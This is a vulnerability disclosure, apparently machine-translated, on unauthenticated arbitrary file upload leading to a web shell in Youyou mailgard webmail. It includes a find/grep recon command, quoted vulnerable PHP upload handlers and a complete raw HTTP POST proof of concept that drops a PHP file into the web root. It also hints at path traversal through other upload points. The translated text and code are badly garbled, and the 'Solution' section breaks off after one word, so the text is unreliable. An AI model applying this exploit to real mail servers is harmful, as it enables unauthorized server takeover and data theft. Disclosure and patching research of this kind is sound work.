Youyou mailgard webmail Arbitrary File Upload causes getshell (no login required)

Youyou mailgard webmail Arbitrary File Upload causes getshell (no login required)

1. Unauthorized access to some files (accessible without logon)

Files that do not contain global. php In the root directory can be directly accessed without redirecting to the logon interface.

Therefore, you can find files that may have unauthorized access:

$ find -name "*.php" | xargs grep -L -E "^require_once.+(\.\.\/global|[^/]global)\.php.+;$"

Remove useless files and leave several interesting PHP files:

./overflow_alarm.php./sms_send.php./src/old.rule.php./src/public_folders_upload.php./src/big_attach.php./src/big_att_upload.php./src/read_data.php./src/upload.php./sync/linkman.php

Ii. Arbitrary File Upload due to code Problems

Look at the code of/src/big_att_upload.php. In order to protect the programmers, add mosaic.

<? Php/* + mosaic + | Author: Mosaic | + --------------------------------------------------------------------- + */require_once ('.. /config. php '); require_once ('.. /functions/global. php '); if (isset ($ _ POST ["PHPSESSID"]) {session_id ($ _ POST ["PHPSESSID"]);} $ realDir = realPath ($ _ POST ['dir']). '/'; $ goexpr = true; if (isset ($ _ FILES ["Filedata"]) | Is_uploaded_file ($ _ FILES ["Filedata"] ["tmp_name"]) | $ _ FILES ["Filedata"] ["error"] = 0) {$ fStr = $ _ FILES ["Filedata"] ["name"]; $ fSize = getUnitSpace ($ _ FILES ["Filedata"] ["size"]); $ fArr = explode ('. ', $ fStr); $ fSuffix = end ($ fArr); $ fPrefix = substr ($ fStr, 0,-(strlen ($ fSuffix) + 1 )); $ movefile = $ realDir. $ fStr; $ auton = 0; while ($ goexpr) {if (is_file ($ movefile) & $ _ POST ['attachtype '] = 'Big _ att ') {$ movefile = $ RealDir. $ fPrefix. '('. $ auton. '). '. $ fSuffix; $ fStr = $ fPrefix. '('. $ auton. '). '. $ fSuffix; $ auton ++;} else {$ goexpr = false ;}} if (move_uploaded_file ($ _ FILES ["Filedata"] ["tmp_name"], $ movefile )) {if ($ _ POST ['tachtype '] = 'Big _ att') {echo 'Big _ att :'. $ fStr. ':'. $ fSize; exit;} else {echo '1'; exit ;}}?>

This is also drunk, not only has unauthorized access, but also has any suffix restrictions for uploading.

Directly upload the file named filename to the realPath ($ _ POST ['dir ']).'/'.

POC:

POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1Host: mail.domain.com:889Connection: keep-aliveContent-Length: 658Origin: http://mail.domain.com:889X-Requested-With: ShockwaveFlash/16.0.0.305User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5Accept: */*Referer: http://mail.domain.com:889/src/write_mail.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5Content-Disposition: form-data; name="Filename"vultest.php------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5Content-Disposition: form-data; name="PHPSESSID"outb98m2mckt5a03pejd1aqra0------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5Content-Disposition: form-data; name="dir"/var/www/newmail/------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5Content-Disposition: form-data; name="Filedata"; filename="vultest.php"Content-Type: application/octet-stream12345------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5Content-Disposition: form-data; name="Upload"Submit Query------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--

Access http://mail.domain.com: 889/vultest. php

There are also two upload points, the same problem. realpath supports ../, you know, I will not send POC

/Var/www/newmail/src/upload. php:

<? Php/* + mosaic + | Author: Mosaic | + --------------------------------------------------------------------- + */require_once ('.. /config. php '); // network hard disk // Work-around for setting up a session because Flash Player doesn' t send the cookiesif (isset ($ _ POST ["PHPSESSID"]) {session_id ($ _ POST ["PHPSESSID"]);} $ netDiskDir = HM_BOXS. $ _ POST ['netdi SkDir ']; $ realDir = realPath ($ netDiskDir.'/'. $ _ POST ['curdir']).'/'; if (! Isset ($ _ FILES ["Filedata"]) |! Is_uploaded_file ($ _ FILES ["Filedata"] ["tmp_name"]) | $ _ FILES ["Filedata"] ["error"]! = 0) {$ _ FILES ["Filedata"] = $ _ FILES ["Filedata2"] ;}$ goexpr = true; if (isset ($ _ FILES ["Filedata"]) | is_uploaded_file ($ _ FILES ["Filedata"] ["tmp_name"]) | $ _ FILES ["Filedata"] ["error"] = 0) {$ fStr = $ _ FILES ["Filedata"] ["name"]; $ fArr = explode ('. ', $ fStr); $ fSuffix = end ($ fArr); $ fPrefix = substr ($ fStr, 0,-(strlen ($ fSuffix) + 1 )); $ movefile = $ realDir. $ fStr; $ auton = 0; while ($ goexpr) {if (is_file ($ movefile )){ $ Movefile = $ realDir. $ fPrefix. '('. $ auton. '). '. $ fSuffix; $ auton ++;} else {$ goexpr = false ;}} move_uploaded_file ($ _ FILES ["Filedata"] ["tmp_name"], $ movefile );} if (isset ($ _ FILES ["Filedata2"]) | is_uploaded_file ($ _ FILES ["Filedata2"] ["tmp_name"]) | $ _ FILES ["Filedata2"] ["error"] = 0) {echo 'document. getElementById ("show_Filedata2 "). innerHTML = \ '<input type = "file" id = "Filedata2" name = "Filedata2"> \'; locale E Nt. getElementById ("PHPUploadProgress "). style. display = "none"; document. getElementById ("PHPUploadCompose "). style. display = ""; ';} echo ''; exit;?>

/Var/www/newmail/src/public_folders_upload.php :( realpath supports.../, you know, I will not send POC)

<? Php/* + mosaic + | Author: Mosaic | + --------------------------------------------------------------------- + */require_once ('.. /config. php '); // public folder // Work-around for setting up a session because Flash Player doesn't send the cookiesif (isset ($ _ POST ["PHPSESSID"]) {session_id ($ _ POST ["PHPSESSID"]);} $ pubDir = HM_BOXS. $ _ POST ['pubdir']; $ RealDir = realPath ($ pubDir. '/'. $ _ POST ['curdir']). '/'; if (! Isset ($ _ FILES ["Filedata"]) |! Is_uploaded_file ($ _ FILES ["Filedata"] ["tmp_name"]) | $ _ FILES ["Filedata"] ["error"]! = 0) {$ _ FILES ["Filedata"] = $ _ FILES ["Filedata2"] ;}$ goexpr = true; if (isset ($ _ FILES ["Filedata"]) | is_uploaded_file ($ _ FILES ["Filedata"] ["tmp_name"]) | $ _ FILES ["Filedata"] ["error"] = 0) {$ fStr = $ _ FILES ["Filedata"] ["name"]; $ fArr = explode ('. ', $ fStr); $ fSuffix = end ($ fArr); $ fPrefix = substr ($ fStr, 0,-(strlen ($ fSuffix) + 1 )); $ movefile = $ realDir. $ fStr; $ auton = 0; while ($ goexpr) {if (is_file ($ movefile )){ $ Movefile = $ realDir. $ fPrefix. '('. $ auton. '). '. $ fSuffix; $ auton ++;} else {$ goexpr = false ;}} move_uploaded_file ($ _ FILES ["Filedata"] ["tmp_name"], $ movefile ); exit;} if (isset ($ _ FILES ["Filedata2"]) | is_uploaded_file ($ _ FILES ["Filedata2"] ["tmp_name"]) | $ _ FILES ["Filedata2"] ["error"] = 0) {echo '<script type = "text/javascript"> parent.doc ument. getElementById ("show_Filedata2 "). innerHTML = \ '<input type = "file "Id =" Filedata2 "name =" Filedata2 "> \ 'your parent.doc ument. getElementById ("PHPUploadProgress "). style. display = "none" Export parent.doc ument. getElementById ("PHPUploadCompose "). style. display = ""; </script> ';} echo ''; exit;?>

Solution:

Filter